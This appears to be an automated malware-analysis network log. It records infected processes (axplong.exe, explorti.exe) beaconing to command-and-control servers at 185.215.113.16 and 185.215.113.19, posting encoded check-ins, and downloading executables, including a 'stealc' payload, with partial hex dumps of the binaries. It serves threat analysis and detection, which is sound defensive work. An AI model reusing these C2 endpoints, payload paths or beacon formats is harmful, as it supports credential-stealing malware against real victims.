Jul 26, 2024 17:56:19.618630886 CEST	1236	IN	Data Raw: f4 7d e5 c6 e5 b6 c1 31 9f ba d0 ab d0 e8 e4 61 22 ff 83 21 ac ca 02 58 5b 1e 7c cb 1a 9a 0e e8 22 8f 26 e4 e3 1d 73 87 d2 22 2e 98 c1 ee cb 8e dd ff d4 b8 67 f3 60 85 85 d9 89 b5 8f d5 74 42 54 32 bd cf 57 c5 f4 a2 c2 a9 63 12 d2 b4 7c eb d2 f2 Data Ascii: }1a"!X[\|"&s".g`tBT2Wc\|Wl`4Qt1OQ#e9U4h?7!v6pIed/r1yl4:UPx)H9,dP;Z[{}z3t>I$IW<Hv>
Jul 26, 2024 17:56:19.618689060 CEST	1236	IN	Data Raw: a9 99 ec 83 66 8e 32 41 da a8 8b 23 86 2d 5f 0b 8a 89 c5 36 6a 95 49 70 7b 58 6b 8a b7 4c 2e 44 c5 34 74 1e 62 bf 72 9b 7e e3 17 48 16 ee 97 58 f8 aa 61 66 33 e2 00 5f 44 7e ae 1b 5b fa fe ca 2f 31 07 30 6f 5e 67 fa 72 ea 97 d7 f4 16 da 48 d5 82 Data Ascii: f2A#-_6jIp{XkL.D4tbr~HXaf3_D~[/10o^grH)e}A.yj\|PfKI6YHOEO717m`n(fG#-VwZOu@ze}"VX-_Y\|\|z3/p{
Jul 26, 2024 17:56:19.618699074 CEST	1236	IN	Data Raw: 47 3b 4f b8 0d f5 bf c3 db c9 cd 12 af 05 ab 3b b6 88 0c cc 49 d6 20 6c 25 6e 83 25 74 ce be cf 01 e6 f6 06 e2 ec 20 10 e8 85 9b ac b2 b3 b1 8a 8f 9f cc ca 08 23 59 ad 21 90 df d3 36 ea c2 b0 4c 0e cc f4 cf a4 d4 fd 0b 6a b2 12 09 cc 78 2e 3e 0d Data Ascii: G;O;I l%n%t #Y!6Ljx.>^ONcMu -}9U%?[Lzim%NFs!iiL:D`^I]<@F`@c\Q@BtbQlW*YbGUx5`@:a)
Jul 26, 2024 17:56:19.618709087 CEST	1236	IN	Data Raw: e4 ee a2 8d 1d 33 31 8a 3d 4b 2d d6 45 74 16 ca 5b f5 31 a4 1a 09 91 b1 dd c8 0e 49 42 87 0c 4a 91 d7 72 04 d0 7c e5 e1 63 eb 4c 93 3c 79 dc 07 71 6c 4a 62 82 0e b6 1d 35 f0 a9 4c 7e 3b bb 7c 96 fd 0d bf ae 65 7d 3a dd 88 fb 51 82 79 24 c7 38 1d Data Ascii: 31=K-Et[1IBJr\|cL<yqlJb5L~;\|e}:Qy$8S)A8N;BF`A.9ir}w4vn1I\LdTE:Q!7nplL2jFPYES@i5Ah}oQRf<.IGu
Jul 26, 2024 17:56:19.623598099 CEST	1236	IN	Data Raw: 31 cf ec da ae dd 01 98 aa 72 c9 3d 51 5e 25 fd 56 4b 72 97 ed de f4 cc 0a bb 84 39 c8 18 c4 92 f1 8d 12 76 be 23 67 04 94 15 8e 51 f2 a2 04 04 1c 6f cb 4d 01 46 2b 84 1d d9 9d 18 86 d7 bc bc 63 63 d8 6a d4 81 db 06 a2 3b f7 f9 09 f9 23 b6 d1 42 Data Ascii: 1r=Q^%VKr9v#gQoMF+ccj;#BO}yvsh.?Bz$tk'L@ZzyVOjbI76q6{j17mYW(Q_cpQ`{"')c6+5
Jul 26, 2024 17:56:21.664201975 CEST	79	OUT	GET /mine/enter.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Jul 26, 2024 17:56:22.035773993 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:56:21 GMT Content-Type: application/octet-stream Content-Length: 1895424 Last-Modified: Fri, 26 Jul 2024 15:01:58 GMT Connection: keep-alive ETag: "66a3ba66-1cec00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 10 41 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 e0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELAfJ@K(L@WkJJ @.rsrc@.idata @ @*@owfltkii0@lwtisuouJ@.taggant0J"@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	61179	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:03.130245924 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:03.887404919 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:03.888472080 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:57:04.148353100 CEST	486	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 32 37 0d 0a 20 3c 63 3e 31 30 30 30 30 32 35 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 61 39 61 37 31 33 66 34 66 63 65 38 62 65 34 62 36 38 65 37 65 31 37 35 35 37 37 37 63 62 37 62 39 30 34 65 64 35 62 36 36 37 66 32 39 61 62 31 66 33 23 31 30 30 30 30 32 37 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 61 39 61 37 32 31 65 39 66 34 66 36 62 37 35 38 36 65 65 61 61 61 36 33 36 62 37 37 23 31 30 30 30 30 32 38 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 61 39 61 37 32 31 65 39 66 34 66 36 62 37 31 38 32 35 65 62 66 63 36 33 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 127 <c>1000025001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a713f4fce8be4b68e7e1755777cb7b904ed5b667f29ab1f3#1000027001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a721e9f4f6b7586eeaaa636b77#1000028001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a721e9f4f6b71825ebfc63#<d>0
Jul 26, 2024 17:57:04.149785995 CEST	67	OUT	GET /inc/PharmaciesDetection.exe HTTP/1.1 Host: 185.215.113.16
Jul 26, 2024 17:57:04.393942118 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:04 GMT Content-Type: application/octet-stream Content-Length: 867038 Last-Modified: Fri, 26 Jul 2024 15:52:44 GMT Connection: keep-alive ETag: "66a3c64c-d3ade" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 da e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 ce 06 00 00 42 00 00 83 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 b0 0f 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOnB8@@4@Y>'d.textmn `.rdatab*,r@@.data~@.ndata0.rsrcY@Z@@.reloc2@B
Jul 26, 2024 17:57:04.393960953 CEST	164	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d Data Ascii: U\}t+}FEuH-GHPuuu@KSV5-GWEPu@eEEPu@}eD@
Jul 26, 2024 17:57:04.393970966 CEST	1236	IN	Data Raw: 00 e9 89 00 00 00 0f b6 46 52 0f b6 56 56 0f af 55 e8 8b cf 2b 4d e8 0f af c1 03 c2 99 f7 ff 89 4d 10 0f b6 c0 c1 e0 08 89 45 14 0f b6 46 51 0f af c1 0f b6 4e 55 0f af 4d e8 03 c1 99 f7 ff 8b 4d 14 0f b6 56 54 0f af 55 e8 0f b6 c0 0b c8 0f b6 46 Data Ascii: FRVVU+MMEFQNUMMVTUFPEEPMH@EPEEPu@uE9}n~Xtev4L@EtU}jWEEP@vXWT@u5X@Wh EEPjhFW
Jul 26, 2024 17:57:04.394089937 CEST	1236	IN	Data Raw: ff 75 0c ff 75 08 ff 15 0c 80 40 00 85 c0 75 de eb df 55 8b ec a1 c4 b0 40 00 8b 40 04 56 85 c0 74 04 8b f0 eb 0c 8b 35 84 2e 47 00 81 c6 01 00 00 80 8d 45 08 50 a1 b0 2e 47 00 0b 45 08 50 6a 00 6a 22 e8 d3 fe ff ff 50 56 ff 15 04 80 40 00 f7 d8 Data Ascii: uu@uU@@Vt5.GEP.GEPjj"PV@#E^]U-GSVuWjY}UMi@i@E0GE@E3]G$0@Rh@LEYYS@Ph@\|LYYSu@9
Jul 26, 2024 17:57:04.394100904 CEST	1236	IN	Data Raw: fc 01 00 00 00 e9 c4 16 00 00 6a 31 e8 36 fa ff ff 8b f0 8b 45 d4 8b c8 c1 f8 03 56 83 e0 02 83 e1 07 50 51 68 d8 8b 40 00 89 75 cc 89 4d 08 e8 5a 48 00 00 83 c4 10 56 e8 d3 42 00 00 56 be c8 b0 40 00 85 c0 74 08 56 e8 a7 45 00 00 eb 17 68 b0 b0 Data Ascii: j16EVPQh@uMZHVBV@tVEhLVEPLPEVE0A}\|1VCH3;tMQPd@E#@E9]uVhC3}@Ph@VrCE9]uwVh@GYYh0GWEV
Jul 26, 2024 17:57:04.394110918 CEST	1236	IN	Data Raw: 6a e8 53 e8 14 49 00 00 50 e9 45 fd ff ff 83 c7 04 57 be c8 b0 40 00 56 e8 03 41 00 00 a1 c0 b0 40 00 83 c0 04 50 57 e8 f4 40 00 00 a1 c0 b0 40 00 56 83 c0 04 50 e9 27 0f 00 00 3b cb 74 2b 3b fb 75 10 68 d0 89 40 00 e8 6d 43 00 00 59 e9 d7 fa ff Data Ascii: jSIPEW@VA@PW@@VP';t+;uh@mCYGPV@@W4h@j@$@uFPH@5@cjYjYEEEtj3EEtjDE}!uJ3AjYxM;tUR
Jul 26, 2024 17:57:04.394121885 CEST	1236	IN	Data Raw: c5 f7 ff ff 6a 11 e8 94 f0 ff ff 68 04 20 00 00 8b f8 56 57 e8 94 4e 00 00 83 c4 0c 85 c0 75 07 c7 45 fc 01 00 00 00 56 57 68 ac 87 40 00 e9 96 f7 ff ff c7 45 fc 01 00 00 00 39 1d b8 2e 47 00 0f 8c e2 00 00 00 6a f0 e8 52 f0 ff ff 6a 01 8b f8 e8 Data Ascii: jh VWNuEVWh@E9.GjRjIE9]tW4@E;ujSW8@E;uu?;t=]9]tutBE9h@h@h0Gh uuj*WuhX@=9]3
Jul 26, 2024 17:57:04.394536018 CEST	820	IN	Data Raw: 00 00 80 8b 45 e4 89 45 f0 8b 45 e8 6a 02 89 45 ec e8 b5 eb ff ff 6a 11 89 45 f4 e8 ab eb ff ff 57 89 45 08 e8 06 39 00 00 59 53 89 45 cc 8d 45 bc 50 a1 b0 2e 47 00 53 83 c8 02 50 53 53 53 ff 75 08 33 f6 46 57 89 75 fc ff 15 14 80 40 00 85 c0 0f Data Ascii: EEEjEjEWE9YSEEP.GSPSSSu3FWu@]0A9uuBj#`W7WuDuEu9uuh@9h@o9j^9uu'jYPu0AuuuhH@@9}uBhWSuPWE
Jul 26, 2024 17:57:04.394630909 CEST	1236	IN	Data Raw: 00 00 00 56 88 5d c7 e8 99 33 00 00 89 45 bc 39 5d f8 0f 8e 9e 00 00 00 8b f3 53 8d 45 ec 50 6a 01 8d 45 0b 50 ff 75 bc ff 15 58 81 40 00 85 c0 0f 84 82 00 00 00 83 7d ec 01 75 7c 39 5d e0 75 39 6a 02 8d 45 f4 50 6a 01 8d 45 0b 50 53 53 ff 15 5c Data Ascii: V]3E9]SEPjEPuX@}u\|9]u9jEPjEPSS\@E<t.<t*fEfwEFE:tE;u\|>EPW3:Et}t}ufEfwFjSju`@3fw;9]t3Af@3@jPp3f9[
Jul 26, 2024 17:57:04.394769907 CEST	224	IN	Data Raw: 00 ff b4 81 94 00 00 00 57 e8 5e 37 00 00 eb 3a a1 74 72 45 00 53 23 c2 50 6a 0b ff 75 f4 ff 15 88 82 40 00 39 5d d4 74 21 53 53 ff 75 f4 ff 15 84 82 40 00 eb 14 6a 01 e8 86 e3 ff ff 50 e8 d0 32 00 00 50 56 e8 6e 2e 00 00 8b 45 fc 01 05 88 2e 47 Data Ascii: W^7:trES#Pju@9]t!SSu@jP2PVn.E.G3_^[I@@<@P@r@@@B@n@@@@@6@@b@@@@F@i@@@@\@@@@@@@@J
Jul 26, 2024 17:57:04.394779921 CEST	1236	IN	Data Raw: 20 40 00 65 20 40 00 82 20 40 00 9f 20 40 00 f9 20 40 00 75 21 40 00 b5 21 40 00 38 22 40 00 cc 22 40 00 fd 22 40 00 92 23 40 00 c1 23 40 00 f0 23 40 00 fb 24 40 00 65 26 40 00 fc 26 40 00 13 27 40 00 97 27 40 00 e3 27 40 00 80 28 40 00 ff 29 40 Data Ascii: @e @ @ @ @u!@!@8"@"@"@#@#@#@$@e&@&@'@'@'@(@)@@@*@#+@+@,@,@-@-@-@.@U.@n/@/@I0@0@0@0@0@2@6@:@?@U@Y@]@a@l@y@@@@U}ujhju

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	61180	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:03.310659885 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:57:04.085252047 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:57:04.088546038 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:57:04.348078966 CEST	381	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 62 66 0d 0a 20 3c 63 3e 31 30 30 30 30 30 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 33 39 31 30 65 35 65 62 66 35 64 65 30 34 33 34 39 30 32 35 30 38 30 64 39 23 31 30 30 30 30 30 33 30 30 32 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 38 66 64 61 37 64 66 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: bf <c>1000002001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca73910e5ebf5de04349025080d9#1000003002+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e8fda7df30804042ba5ce902415450#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	61181	185.215.113.16	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:57:04.359719038 CEST	57	OUT	GET /stealc/random.exe HTTP/1.1 Host: 185.215.113.16
Jul 26, 2024 17:57:05.139707088 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:04 GMT Content-Type: application/octet-stream Content-Length: 250368 Last-Modified: Fri, 26 Jul 2024 15:47:14 GMT Connection: keep-alive ETag: "66a3c502-3d200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 67 94 73 08 06 fa 20 08 06 fa 20 08 06 fa 20 67 70 51 20 13 06 fa 20 67 70 64 20 18 06 fa 20 67 70 50 20 6c 06 fa 20 01 7e 69 20 03 06 fa 20 08 06 fb 20 7b 06 fa 20 67 70 55 20 09 06 fa 20 67 70 60 20 09 06 fa 20 67 70 67 20 09 06 fa 20 52 69 63 68 08 06 fa 20 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 6c 42 a1 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 1a 02 00 00 78 03 02 00 00 00 00 4c 20 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 05 02 00 04 00 00 9a 02 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Lgs gpQ gpd gpP l ~i { gpU gp` gpg Rich PELlBdxL 0@`XxlYS@0.text `.rdata204@@.data.pR@.yoboy.@@.tezanaz2@.rsrc6@@
Jul 26, 2024 17:57:05.139715910 CEST	164	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 8b f1 c7 06 b0 53 42 00 e8 a9 06 00 00 f6 44 24 08 01 74 07 56 e8 03 0c 00 00 Data Ascii: VSBD$tVY^4U( BeE$BV3W{EEu(BE?E,BE
Jul 26, 2024 17:57:05.140516043 CEST	1236	IN	Data Raw: 45 ec 20 00 00 00 c7 45 f4 02 00 00 00 83 45 f4 03 a1 f4 7e 44 02 8b ce c1 e1 04 03 4d e8 3d a9 0f 00 00 75 0a c7 05 f0 7e 44 02 40 2e eb ed 3d eb 03 00 00 75 07 83 25 7c 79 44 02 00 8b 45 f0 c1 e8 05 89 45 fc 8b 45 fc 03 45 e4 8b 55 f8 03 d6 33 Data Ascii: E EE~DM=u~D@.=u%\|yDEEEEU33+=~D~D=EuEP3PPPd0Bj0BEEEMEGaE33E+MuM{_3^U~DyDV3;SW=~DY
Jul 26, 2024 17:57:05.140527010 CEST	1236	IN	Data Raw: 2e 01 7f 09 47 81 ff 1b 01 03 00 7c c5 a1 64 a8 42 00 a3 f4 7e 44 02 e8 90 fc ff ff bf 37 ec 02 00 81 3d f4 7e 44 02 1f 05 00 00 75 0e 56 8d 85 fc fb ff ff 50 ff 15 58 30 42 00 4f 75 e3 5f 33 c0 5e c9 c2 10 00 8b ff 55 8b ec 83 ec 20 83 65 e0 00 Data Ascii: .G\|dB~D7=~DuVPX0BOu_3^U eWjY3}_9EujEtVuEuEuEPEEBMxEEPjRYY^Uujuug]Au(2B
Jul 26, 2024 17:57:05.140542984 CEST	328	IN	Data Raw: 00 00 83 c4 0c 85 f6 74 c1 83 c8 ff 33 d2 f7 f7 39 45 14 77 b5 0f af 7d 14 f7 46 0c 0c 01 00 00 89 7d f0 8b df 74 08 8b 46 18 89 45 f4 eb 07 c7 45 f4 00 10 00 00 85 ff 0f 84 da 00 00 00 f7 46 0c 0c 01 00 00 74 44 8b 46 04 85 c0 74 3d 0f 88 f2 00 Data Ascii: t39Ew}F}tFEEFtDFt=;r;}W6uu))~>}+)}};]r\}t3;vuu+;w;Ew[PuVoYPB(t{tdE+)E$VM!Y
Jul 26, 2024 17:57:05.141366005 CEST	1236	IN	Data Raw: 0c 20 8b c7 2b c3 33 d2 f7 75 10 e9 84 fe ff ff 83 4e 0c 10 eb ec 6a 0c 68 a0 55 42 00 e8 01 1b 00 00 33 f6 89 75 e4 39 75 10 74 2f 39 75 14 74 2a 39 75 18 75 2d 83 7d 0c ff 74 0f ff 75 0c 56 ff 75 08 e8 fb 28 00 00 83 c4 0c e8 c3 14 00 00 c7 00 Data Ascii: +3uNjhUB3u9ut/9ut*9uu-}tuVu(f3uhYuuuuuuEEEuYUuuujuZ]U],,tj.,YpBtjh@jR
Jul 26, 2024 17:57:05.141376972 CEST	1236	IN	Data Raw: 50 e8 7c 27 00 00 e8 9c 27 00 00 c7 45 fc fe ff ff ff 8b 45 e0 e8 7a 16 00 00 c3 e8 ed 37 00 00 e9 89 fe ff ff 8b ff 55 8b ec 51 56 8b 75 0c 56 e8 ed 15 00 00 89 45 0c 8b 46 0c 59 a8 82 75 17 e8 fa 0f 00 00 c7 00 09 00 00 00 83 4e 0c 20 83 c8 ff Data Ascii: P\|''EEz7UQVuVEFYuN /@t"S3t^NFFF^]u, ;ty@;uusAYuVAYFWF>HN+IN;~WPu
Jul 26, 2024 17:57:05.141386986 CEST	448	IN	Data Raw: 0f 8d 17 09 00 00 83 8d f0 fd ff ff 04 f7 9d cc fd ff ff e9 05 09 00 00 8b 85 cc fd ff ff 6b c0 0a 0f be ca 8d 44 08 d0 89 85 cc fd ff ff e9 ea 08 00 00 89 b5 e8 fd ff ff e9 df 08 00 00 80 fa 2a 75 26 83 c3 04 89 9d d8 fd ff ff 8b 5b fc 89 9d e8 Data Ascii: kD*u&[;kDItUhtDltwr?luGWK ?<6u4u
Jul 26, 2024 17:57:05.142163992 CEST	1236	IN	Data Raw: 00 0f 84 79 02 00 00 83 f8 53 0f 8f f2 00 00 00 0f 84 80 00 00 00 83 e8 41 74 10 48 48 74 58 48 48 74 08 48 48 0f 85 8c 05 00 00 80 c2 20 c7 85 94 fd ff ff 01 00 00 00 88 95 ef fd ff ff 83 8d f0 fd ff ff 40 8d bd f4 fd ff ff b8 00 02 00 00 89 bd Data Ascii: ySAtHHtXHHtHH @9H00uu[;u$pB
Jul 26, 2024 17:57:05.142175913 CEST	1236	IN	Data Raw: 02 00 00 39 85 e8 fd ff ff 7e 06 89 85 e8 fd ff ff 8b c7 0b c3 75 06 21 85 d0 fd ff ff 8d 75 f3 8b 85 e8 fd ff ff ff 8d e8 fd ff ff 85 c0 7f 06 8b c7 0b c3 74 2d 8b 85 e0 fd ff ff 99 52 50 53 57 e8 e1 43 00 00 83 c1 30 89 9d 9c fd ff ff 8b f8 8b Data Ascii: 9~u!ut-RPSWC09~NE+Ftbt90tW0@?If90t;u+(;u pBI8t@;u+}
Jul 26, 2024 17:57:05.142950058 CEST	1236	IN	Data Raw: 08 5d c3 e8 8c 24 00 00 85 c0 75 06 b8 90 71 42 00 c3 83 c0 08 c3 e8 79 24 00 00 85 c0 75 06 b8 94 71 42 00 c3 83 c0 0c c3 8b ff 55 8b ec 56 e8 e2 ff ff ff 8b 4d 08 51 89 08 e8 82 ff ff ff 59 8b f0 e8 bc ff ff ff 89 30 5e 5d c3 8b ff 55 8b ec 8b Data Ascii: ]$uqBy$uqBUVMQY0^]UUVWt}uj^0A3Eu+@tOuugj"Y3_^]US]woVW=PJCuGjhYYt3@Pj5PJC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	61182	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
